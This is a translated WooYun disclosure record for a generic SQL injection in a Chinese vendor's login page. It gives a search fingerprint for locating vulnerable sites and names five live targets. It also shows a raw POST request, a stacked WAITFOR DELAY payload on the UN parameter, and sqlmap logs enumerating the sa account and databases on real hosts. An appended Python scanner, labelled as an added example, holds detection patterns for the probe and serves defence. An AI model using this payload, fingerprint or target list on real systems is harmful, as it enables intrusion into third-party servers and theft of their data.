
Vulnerability Summary (followers: 24)

Defect ID: wooyun-2014-082330

Title: A certain digital system contains a generic SQL injection vulnerability

Affected vendor: cncert (National Internet Emergency Center)

Author: Mr.leo

Submitted: 2014-11-10 10:40

Fix time: 2015-02-08 10:42

Published: 2015-02-08 10:42

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2014-11-10: Details sent to the vendor; awaiting vendor handling
2014-11-14: Vendor confirmed; details disclosed to the vendor only
2014-11-17: Details opened to third-party security partners
2015-01-08: Details disclosed to core white hats and experts in the relevant field
2015-01-18: Details disclosed to regular white hats
2015-01-28: Details disclosed to intern white hats
2015-02-08: Details disclosed to the public

Brief description:

boom!!

Detailed description:

Vendor: 南京苏亚星资讯科技开发有限公司
Baidu search keywords (fingerprint of the login page): 帮助 正在读取数据... 注册用户 系统用户 用户名: 密码: 南京苏亚星资讯科技开发
http://www.baidu.com/s?wd=帮助%20正在读取数据...%20注册用户%20系统用户%20用户名%3A%20密码%3A%20南京苏亚星资讯科技开发&pn=50&oq=帮助%20正在读取数据...%20注册用户%20系统用户%20用户名%3A%20密码%3A%20南京苏亚星资讯科技开发&ie=utf-8&rsv_pq=bf3e63ef00016d7a&rsv_t=7c9aDgkEFKzDMR0WdiRIc8zStNMuWUt5eZkDVjpK8DDhOOqWH8Hi&rsv_page=1&f=8&rsv_bp=1&tn=baidu
Five cases demonstrate that the flaw is generic: the UN parameter of the login page is injectable.
http://sportingbus.com/
http://fjzhyz.cn/
http://www.scyahyez.com/
http://jwculture.com/
http://183.167.250.28:85/

POST /srp2003/login.asp HTTP/1.1
Host: www.scyahyez.com
Connection: keep-alive
Content-Length: 48
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.scyahyez.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.scyahyez.com/
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASPSESSIONIDQSTBBBBQ=KFBFAEIAMHCLPDLNGNJLDONN
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
type=1&ST=Sys&UN=1%27&PW=1&submit1=%B5%C7+%C2%BC


1. Parameter: UN
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: type=1&ST=Sys&UN=1'; WAITFOR DELAY '0:0:5';--&PW=2&submit1=?? ?
---
[16:20:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[16:20:38] [INFO] fetching current user
[16:20:39] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[16:21:10] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[16:22:10] [INFO] adjusting time delay to 1 second due to good response times
sa
current user: 'sa'
[16:22:30] [INFO] fetching current database
[16:22:30] [INFO] retrieved: SRP2003
current database: 'SRP2003'
[16:25:18] [INFO] fetching database names
[16:25:18] [INFO] fetching number of databases
[16:25:18] [INFO] retrieved: 6
[16:26:11] [INFO] retrieved: ma
[16:27:17] [ERROR] invalid character detected. retrying..
[16:27:17] [WARNING] increasing time delay to 2 seconds
sterA
[16:30:30] [INFO] retrieved: model
[16:34:48] [INFO] retrieved: msdb
[16:37:53] [INFO] retrieved: SRP2003
[16:43:24] [INFO] retrieved: tempdb
[16:48:40] [INFO] retrieved: Vod2005
available databases [6]:
[*] masterA
[*] model
[*] msdb
[*] SRP2003
[*] tempdb
[*] Vod2005
[16:54:36] [WARNING] HTTP error codes detected during testing:
503 (Service Unavailable) - 2 times
[16:54:36] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???~1.COM\TOOls\????\SQLMAP~1\Bin\output\sportingbus.com'
2. Place: POST
Parameter: UN
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: type=1&ST=Sys&UN=1'; WAITFOR DELAY '0:0:5';--&PW=2&submit1=?? ?
---
[07:04:11] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2000
[07:04:11] [INFO] fetching current user
[07:04:11] [INFO] resumed: sa\x11\t
current user: 'sa'
[07:04:11] [INFO] fetching current database
[07:04:11] [INFO] resumed: SRP2003
current database: 'SRP2003'
[07:04:11] [INFO] fetching database names
[07:04:11] [INFO] fetching number of databases
[07:04:11] [INFO] resumed: 14
[07:04:11] [INFO] resumed: Jupite{5
[07:04:11] [INFO] resumed: m?s?eyI
[07:04:11] [INFO] resumed: Merak
[07:04:11] [INFO] resumed: modexA
[07:04:11] [INFO] resumed: msdb
[07:04:11] [INFO] resumed: No|th?ind\x19!A\x02
[07:04:11] [INFO] resumed: pubs%
[07:04:11] [INFO] resumed: SM2005
[07:04:11] [INFO] resumed: SRP2003
[07:04:11] [INFO] resumed: tempqb
[07:04:11] [INFO] resumed: TempJupiterSa
[07:04:11] [INFO] resumed: vc2003
[07:04:11] [INFO] resumed: Vod2005A
[07:04:11] [INFO] resumed: ys2004
available databases [14]:
[*] [Jupite{5]
[*] [m?s?eyI]
[*] [No|th?ind!A]
[*] [pubs%]
[*] Merak
[*] modexA
[*] msdb
[*] SM2005
[*] SRP2003
[*] TempJupiterSa
[*] tempqb
[*] vc2003
[*] Vod2005A
[*] ys2004
[07:04:11] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???~1.COM\TOOls\????\SQLMAP~1\Bin\output\fjzhyz.cn'
3. Place: POST
Parameter: UN
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: type=1&ST=Sys&UN=1'; WAITFOR DELAY '0:0:5';--&PW=2&submit1=?? ?
---
[21:25:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[21:25:41] [INFO] fetching current user
[21:25:41] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[21:27:02] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[21:28:11] [INFO] adjusting time delay to 2 seconds due to good response times
sa
current user: 'sa\x11'
[21:31:00] [INFO] fetching current database
[21:31:00] [INFO] retrieved: S
[21:33:27] [ERROR] invalid character detected. retrying..
[21:33:27] [WARNING] increasing time delay to 3 seconds
RP2003
current database: 'SRP2003'
[21:44:54] [INFO] fetching database names
[21:44:54] [INFO] fetching number of databases
[21:44:54] [INFO] retrieved: 13
[21:47:02] [INFO] retrieved: Jupiter
[22:01:37] [ERROR] invalid character detected. retrying..
[22:01:37] [WARNING] increasing time delay to 4 seconds
5
[22:03:59] [INFO] retrieved: master
[22:17:05] [INFO] retrieved:
[22:19:21] [ERROR] invalid character detected. retrying..
[22:19:21] [WARNING] increasing time delay to 5 seconds
Merak
[22:30:58] [INFO] retrieved: model
[22:45:05] [INFO] retrieved: msdb
[22:55:34] [INFO] retrieved: ReportServer
[23:27:29] [INFO] retrieved: ReportServerT
[00:03:35] [ERROR] invalid character detected. retrying..
[00:03:35] [WARNING] increasing time delay to 6 seconds
[00:05:45] [ERROR] invalid character detected. retrying..
[00:05:45] [WARNING] increasing time delay to 7 seconds
[00:08:08] [ERROR] unable to properly validate last character value ('q')..
qmpDB
[00:14:17] [INFO] retrieved: SM2005
[00:22:58] [INFO] retrieved: SRP200
[00:34:01] [ERROR] invalid character detected. retrying..
[00:34:01] [WARNING] increasing time delay to 3 seconds
[00:53:35] [INFO] retrieved:
[01:13:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[01:13:08] [INFO] retrieved:
[01:32:43] [INFO] retrieved:
[01:52:17] [INFO] retrieved:
available databases [9]:
[*] Jupiter5
[*] master
[*] Merak
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTqmpDB
[*] SM2005
[*] SRP200
[02:11:50] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.scyahyez.com'
5. Place: POST
Parameter: UN
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: type=1&ST=Sys&UN=1'; WAITFOR DELAY '0:0:5';--&PW=2&submit1=?? ?
---
[22:04:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[22:04:39] [INFO] fetching current user
[22:04:39] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[22:05:59] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[22:07:08] [INFO] adjusting time delay to 2 seconds due to good response times
sa
current user: 'sa'
[22:09:15] [INFO] fetching current database
[22:09:15] [INFO] retrieved: SRP2003
current database: 'SRP2003'
[22:19:29] [INFO] fetching database names
[22:19:29] [INFO] fetching number of databases
[22:19:29] [INFO] retrieved:
[22:19:48] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[22:19:48] [ERROR] unable to retrieve the number of databases
[22:19:48] [INFO] retrieved: SRP2003
[22:30:01] [INFO] retrieved: master
[22:38:36] [INFO] retrieved: tempdb
[22:47:46] [INFO] retrieved: model
[22:55:32] [INFO] retrieved: msdb
[23:01:29] [INFO] retrieved: pubs
[23:07:51] [INFO] retrieved: Northwind
[23:21:52] [INFO] retrieved: SRP2003
[23:32:03] [INFO] retrieved: Vod2005
[23:42:38] [INFO] retrieved: SM2005
[23:51:12] [INFO] retrieved: Merak
[23:57:58] [INFO] retrieved: ws2004
[00:07:20] [INFO] retrieved: vc2003
[00:16:35] [INFO] retrieved: Jup
[00:22:13] [ERROR] invalid character detected. retrying..
[00:22:13] [WARNING] increasing time delay to 3 seconds
iter5
[00:31:12] [INFO] retrieved:
[00:32:25] [ERROR] invalid character detected. retrying..
[00:32:25] [WARNING] increasing time delay to 4 seconds
TempJupiterSa
[01:00:50] [INFO] retrieved:
available databases [15]:
[*] Jupiter5
[*] master
[*] Merak
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] SM2005
[*] SRP2003
[*] tempdb
[*] TempJupiterSa
[*] vc2003
[*] Vod2005
[*] ws2004
[01:03:58] [WARNING] HTTP error codes detected during testing:
503 (Service Unavailable) - 4 times
[01:03:58] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???~1.COM\TOOls\????\SQLMAP~1\Bin\output\183.167.250.28'

Proof of vulnerability:

Demonstrated above.

Fix suggestion:

Filter the input.
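Added example, not from the original report or the vendor's code: a small defender-side Python check of the kind that can be run over a reverse-proxy or WAF log of POST bodies sent to the login endpoint described above. It flags the UN parameter when it carries the MSSQL stacked WAITFOR DELAY probe shown in the sqlmap output, and upgrades the finding to "confirmed" only when the logged response time matches the injected delay. The log format, IP addresses and request bodies are constructed for illustration; the delay threshold is an assumption.

```python
import re
from urllib.parse import parse_qs

# Constructed sample log: (client_ip, POST body to /srp2003/login.asp, response seconds).
# These entries are made up for illustration and are not taken from the report.
SAMPLE_REQUESTS = [
    ("198.51.100.10", "type=1&ST=Sys&UN=admin&PW=secret&submit1=x", 0.21),
    ("198.51.100.11", "type=1&ST=Sys&UN=1%27&PW=1&submit1=x", 0.19),
    ("198.51.100.11",
     "type=1&ST=Sys&UN=1%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--&PW=2&submit1=x",
     5.23),
    ("198.51.100.12", "type=1&ST=Sys&UN=o%27brien&PW=pw&submit1=x", 0.20),
]

# MSSQL stacked time-based probe: a statement terminator followed by WAITFOR DELAY.
STACKED_DELAY = re.compile(r";\s*waitfor\s+delay\s+'", re.IGNORECASE)
# A trailing comment marker that would discard the rest of the original query.
COMMENT_TAIL = re.compile(r"(--|/\*)\s*$")


def classify(body, response_seconds, delay_threshold=4.0):
    """Return (verdict, findings) for one login POST body.

    'benign': nothing suspicious; 'probe': injection syntax seen but no timing
    evidence; 'confirmed-time-based': WAITFOR DELAY seen and the response took
    at least delay_threshold seconds (assumed threshold, just under the 5 s delay).
    """
    # parse_qs percent-decodes values, so UN=1%27 becomes the literal 1'
    fields = parse_qs(body, keep_blank_values=True)
    un = fields.get("UN", [""])[0]
    stacked = bool(STACKED_DELAY.search(un))
    findings = []
    if stacked:
        findings.append("stacked WAITFOR DELAY in UN")
    if COMMENT_TAIL.search(un):
        findings.append("trailing SQL comment in UN")
    if un.endswith("'"):
        findings.append("UN ends with an unbalanced single quote")
    if not findings:
        return "benign", findings
    if stacked and response_seconds >= delay_threshold:
        return "confirmed-time-based", findings
    return "probe", findings


def scan(requests):
    """Classify every logged request; returns [(ip, verdict, findings), ...]."""
    return [(ip, *classify(body, secs)) for ip, body, secs in requests]


if __name__ == "__main__":
    for ip, verdict, findings in scan(SAMPLE_REQUESTS):
        print(ip, verdict, "; ".join(findings))
```

A legitimate apostrophe inside a username (the o'brien entry) is left alone because only a quote at the end of the value, a stacked statement, or a trailing comment is treated as injection syntax.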

Copyright notice: please credit the source when reposting: Mr.leo@WooYun


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 14

Confirmed: 2014-11-14 14:10

Vendor reply:

Latest status:

None yet